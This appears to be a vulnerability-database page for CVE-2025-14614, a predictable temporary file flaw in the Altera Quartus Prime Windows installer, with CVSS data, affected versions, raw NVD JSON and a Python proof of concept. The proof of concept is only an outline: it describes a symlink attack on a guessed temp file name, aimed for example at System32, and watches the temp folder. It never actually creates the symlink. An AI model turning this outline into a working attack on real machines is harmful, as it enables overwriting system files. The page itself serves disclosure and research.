Security Vulnerability Report
中文
CVE-2025-14614 CVSS 6.7 MEDIUM

CVE-2025-14614

Published: 2026-01-07 12:16:55
Last Modified: 2026-01-12 15:16:29
Source: 04c0172e-9735-4a9d-a92a-fe01fa863447

Description

Insecure Temporary File vulnerability in Altera Quartus Prime Standard  Installer (SFX) on Windows, Altera Quartus Prime Lite  Installer (SFX) on Windows allows Explore for Predictable Temporary File Names.This issue affects Quartus Prime Standard: from 23.1 through 24.1; Quartus Prime Lite: from 23.1 through 24.1.

CVSS Details

CVSS Score
6.7
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:intel:quartus_prime:*:*:*:*:lite:*:*:* - VULNERABLE
cpe:2.3:a:intel:quartus_prime:*:*:*:*:standard:*:*:* - VULNERABLE
cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:* - NOT VULNERABLE
Altera Quartus Prime Standard 23.1
Altera Quartus Prime Standard 23.2
Altera Quartus Prime Standard 23.3
Altera Quartus Prime Standard 23.4
Altera Quartus Prime Standard 24.1
Altera Quartus Prime Lite 23.1
Altera Quartus Prime Lite 23.2
Altera Quartus Prime Lite 23.3
Altera Quartus Prime Lite 23.4
Altera Quartus Prime Lite 24.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2025-14614 PoC - Insecure Temporary File in Quartus Prime Installer This PoC demonstrates the concept of predictable temporary file exploitation. Note: Actual exploitation requires local access and user interaction. """ import os import sys import time import threading from pathlib import Path def create_symlink_attack(target_path, malicious_content): """ Simulate a symlink attack on predictable temporary files. In real attack, this would be combined with the installer's temp file pattern. """ print(f"[*] Setting up symlink attack...") print(f"[*] Target path: {target_path}") # In actual attack, the installer would use a predictable temp file name # like: %TEMP%\quartus_install_XXXX.tmp temp_file_pattern = os.path.join(os.environ.get('TEMP', '/tmp'), 'quartus_install_0001.tmp') print(f"[*] Predictable temp file: {temp_file_pattern}") print(f"[*] Creating symlink to target: {target_path}") # Note: Creating symlinks typically requires admin privileges on Windows # or Developer Mode enabled try: # Clean up any existing file if os.path.exists(temp_file_pattern): os.remove(temp_file_pattern) # In real attack scenario: # 1. Attacker creates symlink from temp_file_pattern to target # 2. Victim runs Quartus Prime installer # 3. Installer writes to temp_file_pattern (follows symlink) # 4. Malicious content is written to target location print(f"[!] This is a demonstration of the attack concept") print(f"[!] Actual exploitation requires:") print(f"[!] 1. Local access to the target system") print(f"[!] 2. Ability to create symlinks (Admin or Developer Mode)") print(f"[!] 3. User interaction to run the installer") return True except Exception as e: print(f"[-] Error: {e}") return False def monitor_temp_files(): """Monitor for installer temp file creation patterns""" temp_dir = os.environ.get('TEMP', '/tmp') print(f"[*] Monitoring temp directory: {temp_dir}") # Look for quartus-related temp files known_patterns = ['quartus', 'altera', 'install'] while True: try: for item in os.listdir(temp_dir): item_lower = item.lower() if any(pattern in item_lower for pattern in known_patterns): print(f"[+] Found potential temp file: {item}") except: pass time.sleep(2) if __name__ == '__main__': print("=" * 60) print("CVE-2025-14614 - Insecure Temporary File PoC") print("Quartus Prime Installer Temp File Predictability") print("=" * 60) if len(sys.argv) > 1: target = sys.argv[1] create_symlink_attack(target, "malicious content") else: print("Usage: python cve_2025_14614_poc.py <target_path>") print("Example: python cve_2025_14614_poc.py C:\\Windows\\System32\\malicious.dll")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14614", "sourceIdentifier": "04c0172e-9735-4a9d-a92a-fe01fa863447", "published": "2026-01-07T12:16:55.467", "lastModified": "2026-01-12T15:16:28.630", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Insecure Temporary File vulnerability in Altera Quartus Prime Standard \n\nInstaller (SFX)\n\n on Windows, Altera Quartus Prime Lite \n\nInstaller (SFX)\n\n on Windows allows Explore for Predictable Temporary File Names.This issue affects Quartus Prime Standard: from 23.1 through 24.1; Quartus Prime Lite: from 23.1 through 24.1."}, {"lang": "es", "value": "Vulnerabilidad de archivo temporal inseguro en el Instalador (SFX) de Altera Quartus Prime Standard en Windows, el Instalador (SFX) de Altera Quartus Prime Lite en Windows permite la exploración de nombres de archivos temporales predecibles. Este problema afecta a Quartus Prime Standard: desde 23.1 hasta 24.1; Quartus Prime Lite: desde 23.1 hasta 24.1."}], "metrics": {"cvssMetricV40": [{"source": "04c0172e-9735-4a9d-a92a-fe01fa863447", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "attackRequirements": "PRESENT", "privilegesRequired": "LOW", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "04c0172e-9735-4a9d-a92a-fe01fa863447", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H", "baseScore": 6.7, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "04c0172e-9735-4a9d-a92a-fe01fa863447", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-377"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:intel:quartus_prime:*:*:*:*:lite:*:*:*", "versionStartIncluding": "23.1", "versionEndExcluding": "25.1", "matchCriteriaId": "3C682DFC-7352-43BD-9138-341634CDE948"}, {"vulnerable": true, "criteria": "cpe:2.3:a:intel:quartus_prime:*:*:*:*:standard:*:*:*", "versionStartIncluding": "23.1", "versionEndExcluding": "25.1", "matchCriteriaId": "297C4320-AA94-4418-9B31-8072877B7F55"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://www.altera.com/security/security-advisory/asa-0005", "source": "04c0172e-9735-4a9d-a92a-fe01fa863447", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.